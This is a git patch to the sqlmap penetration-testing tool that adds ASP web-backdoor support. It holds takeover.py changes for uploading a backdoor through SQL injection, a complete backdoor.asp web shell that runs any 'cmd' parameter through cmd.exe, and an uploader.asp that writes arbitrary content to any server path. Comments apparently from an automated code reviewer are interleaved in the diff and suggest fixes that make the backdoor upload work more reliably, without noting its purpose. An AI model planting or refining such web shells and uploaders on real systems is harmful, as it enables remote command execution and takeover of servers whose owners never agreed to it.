From c5d20b8a86ad0a4718ef0c71364ebf59b732a9da Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Wed, 6 May 2009 12:14:38 +0000 Subject: [PATCH] Initial support for ASP web backdoor functionality --- lib/request/connect.py | 3 ++ plugins/generic/takeover.py | 93 ++++++++++++++++++++++++++++--------- shell/backdoor.asp | 44 ++++++++++++++++++ shell/uploader.asp | 3 +- 4 files changed, 121 insertions(+), 22 deletions(-) create mode 100644 shell/backdoor.asp
diff --git a/lib/request/connect.py b/lib/request/connect.py
index 3138f7aba..226265ba6 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -92,6 +92,9 @@ class Connect:
 url = "%s?%s" % (url, params)
 requestMsg += "?%s" % params
+ if post:
+ post = urlencode(post).replace("%%", "%")
+
 elif multipart:
 multipartOpener = urllib2.build_opener(multipartpost.MultipartPostHandler)
 conn = multipartOpener.open(url, multipart)
diff --git a/plugins/generic/takeover.py b/plugins/generic/takeover.py
index 1f481c185..4473fbc2a 100644
--- a/plugins/generic/takeover.py
+++ b/plugins/generic/takeover.py
@@ -113,15 +113,14 @@ class Takeover(Abstraction, DEP, Metasploit, Registry):
 def __webBackdoorInit(self):
 """
- This method is used to write a PHP agent (cmd.php) on a writable
+ This method is used to write a web backdoor (agent) on a writable
 remote directory within the web server document root.
- Such agent is written using the INTO OUTFILE MySQL DBMS
- functionality
 """
 self.checkDbmsOs()
 backdoorUrl = None
+ language = None
 kb.docRoot = getDocRoot()
 directories = getDirs()
 directories = list(directories)
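Review bot: `urlencode(post)` on the added line accepts only a mapping or a sequence of pairs, yet the takeover.py hunk later in this patch calls `Request.getPage(..., direct=True, post=postStr)` with `postStr` already formatted as a plain string; if that string reaches this line, Python 2's `urllib.urlencode` (assuming that is the `urlencode` in scope) raises `TypeError: not a valid non-string sequence or mapping object`. Whether `direct=True` routes around this line cannot be seen from the hunk. The trailing `.replace("%%", "%")` also never matches `urlencode` output, which emits every `%` as `%25`, so it reads as a workaround for an escaping problem elsewhere rather than a fix here. A safer contract is to make the accepted forms explicit, `if post and not isinstance(post, basestring): post = urlencode(post)`, and have callers pass `post` as a dict. The enclosing method starts and ends outside the hunk.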
@@ -130,11 +129,44 @@ class Takeover(Abstraction, DEP, Metasploit, Registry):
 infoMsg = "trying to upload the uploader agent"
 logger.info(infoMsg)
- # TODO: backdoor and uploader extensions must be the same as of
- # the web application language in use
- backdoorName = "backdoor.php"
+ message = "which web application language does the web server "
+ message += "support?\n"
+ message += "[1] ASP\n"
+ message += "[2] PHP (default)\n"
+ message += "[3] JSP"
+
+ while True:
+ choice = readInput(message, default="2")
+
+ if not choice or choice == "2":
+ language = "php"
+
+ break
+
+ elif choice == "1":
+ language = "asp"
+
+ break
+
+ elif choice == "3":
+ # TODO: add also JSP backdoor/uploader support
+ errMsg = "JSP web backdoor functionality is not yet "
+ errMsg += "implemented"
+ raise sqlmapUnsupportedDBMSException, errMsg
+
+ #language = "jsp"
+
+ #break
+
+ elif not choice.isdigit():
+ logger.warn("invalid value, only digits are allowed")
+
+ elif int(choice) < 1 or int(choice) > 3:
+ logger.warn("invalid value, it must be 1 or 3")
+
+ backdoorName = "backdoor.%s" % language
 backdoorPath = "%s/%s" % (paths.SQLMAP_SHELL_PATH, backdoorName)
- uploaderName = "uploader.php"
+ uploaderName = "uploader.%s" % language
 uploaderStr = fileToStr("%s/%s" % (paths.SQLMAP_SHELL_PATH, uploaderName))
 for directory in directories:
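Review bot: The range warning in the last `elif` says `it must be 1 or 3` while the menu offers three options; it should read `logger.warn("invalid value, it must be between 1 and 3")`. The `choice == "3"` branch raises `sqlmapUnsupportedDBMSException` for an unsupported web language, which misreports the error category to any caller that catches it by type — a sqlmap exception not tied to the DBMS, if one exists, or simply a warning that re-prompts would match the intent better. The commented-out `#language = "jsp"` and `#break` after the `raise` are unreachable and should be dropped in favour of the TODO above them. Since `language` is only ever set to `"php"` or `"asp"` before the loop exits, `backdoorName` and `uploaderName` are always well-formed at this point. `__webBackdoorInit` starts and ends outside the hunk.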
@@ -165,25 +197,44 @@ class Takeover(Abstraction, DEP, Metasploit, Registry):
 logger.info(infoMsg)
 # Upload the backdoor through the uploader agent
- multipartParams = {
- "upload": "1",
- "file": open(backdoorPath, "r"),
- "uploadDir": directory,
- }
- page = Request.getPage(url=uploaderUrl, multipart=multipartParams)
+ if language == "php":
+ multipartParams = {
+ "upload": "1",
+ "file": open(backdoorPath, "r"),
+ "uploadDir": directory,
+ }
+ page = Request.getPage(url=uploaderUrl, multipart=multipartParams)
- if "Backdoor uploaded" not in page:
- warnMsg = "unable to upload the backdoor through "
- warnMsg += "the uploader agent on '%s'" % directory
- logger.warn(warnMsg)
+ if "Backdoor uploaded" not in page:
+ warnMsg = "unable to upload the backdoor through "
+ warnMsg += "the uploader agent on '%s'" % directory
+ logger.warn(warnMsg)
- continue
+ continue
+
+ elif language == "asp":
+ backdoorRemotePath = "%s/%s" % (directory, backdoorName)
+ backdoorRemotePath = os.path.normpath(backdoorRemotePath)
+ backdoorContent = open(backdoorPath, "r").read()
+ postStr = "f=%s&d=%s" % (backdoorRemotePath, backdoorContent)
+ page, _ = Request.getPage(url=uploaderUrl, direct=True, post=postStr)
+
+ if "permission denied" in page.lower():
+ warnMsg = "unable to upload the backdoor through "
+ warnMsg += "the uploader agent on '%s'" % directory
+ logger.warn(warnMsg)
+
+ continue
+
+ elif language == "jsp":
+ # TODO: add also JSP backdoor/uploader support
+ pass
 backdoorUrl = "%s/%s" % (baseUrl, backdoorName)
- infoMsg = "the backdoor has been successfully uploaded on "
- infoMsg += "'%s', go with your browser to " % directory
- infoMsg += "'%s' and enjoy it!" % backdoorUrl
+ infoMsg = "the backdoor has probably been successfully "
+ infoMsg += "uploaded on '%s', go with your browser " % directory
+ infoMsg += "to '%s' and enjoy it!" % backdoorUrl
 logger.info(infoMsg)
 break
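Review bot: Both new branches leak a file handle — `open(backdoorPath, "r")` inside the PHP `multipartParams` dict and `open(backdoorPath, "r").read()` in the ASP branch are never closed; `backdoorContent = fileToStr(backdoorPath)`, the helper the previous hunk already uses for the uploader, reads the file without leaving a descriptor open. In the ASP branch `postStr = "f=%s&d=%s" % (backdoorRemotePath, backdoorContent)` is built by string formatting with no form encoding, so any `&`, `=`, `%` or `+` in the file content (and the new backdoor.asp contains all of them) will be split or decoded as form syntax on the receiving side; passing `post={"f": backdoorRemotePath, "d": backdoorContent}` and letting the `urlencode(post)` this patch adds to connect.py encode it would fix that and make the two hunks agree. The `elif language == "jsp": pass` branch falls straight through to `backdoorUrl = ...` and the success log, so a JSP run would report "probably been successfully uploaded" without having sent anything; it should `continue` or raise until implemented. The `"permission denied" in page.lower()` check treats every other response as success, which is what the new word "probably" papers over — a positive marker like the PHP branch's "Backdoor uploaded" would be a more reliable signal. The enclosing `for directory in directories:` loop and the method both start outside the hunk.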
diff --git a/shell/backdoor.asp b/shell/backdoor.asp new file mode 100644 index 000000000..c2278aaea --- /dev/null +++ b/shell/backdoor.asp @@ -0,0 +1,44 @@ + + +<% +Set oScript = Server.CreateObject("WSCRIPT.SHELL") +Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") +Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") + +szCMD = request("cmd") + +If (szCMD <> "") Then + szTempFile = "C:\" & oFileSys.GetTempName() + Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) + Set oFile = oFileSys.OpenTextFile(szTempFile, 1, False, 0) + End If +%> + + + +
+ + +
+
+<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
+
+<% + If (IsObject(oFile)) Then + On Error Resume Next + Response.Write Server.HTMLEncode(oFile.ReadAll) + oFile.Close + Call oFileSys.DeleteFile(szTempFile, True) + End If +%> + + diff --git a/shell/uploader.asp b/shell/uploader.asp index 91ca00158..2a45ccc5a 100644 --- a/shell/uploader.asp +++ b/shell/uploader.asp @@ -1 +1,2 @@ -<%set f = server.createobject("Scripting.FileSystemObject"):set o=f.OpenTextFile(Request("f"), 2, True):o.Write Request("d"):o.Close:set o=Nothing:set f=Nothing%> \ No newline at end of file +

sqlmap backdoor uploader

+<%set f = server.createobject("Scripting.FileSystemObject"):set o=f.OpenTextFile(Request("f"), 2, True):o.Write Request("d"):o.Close:set o=Nothing:set f=Nothing%>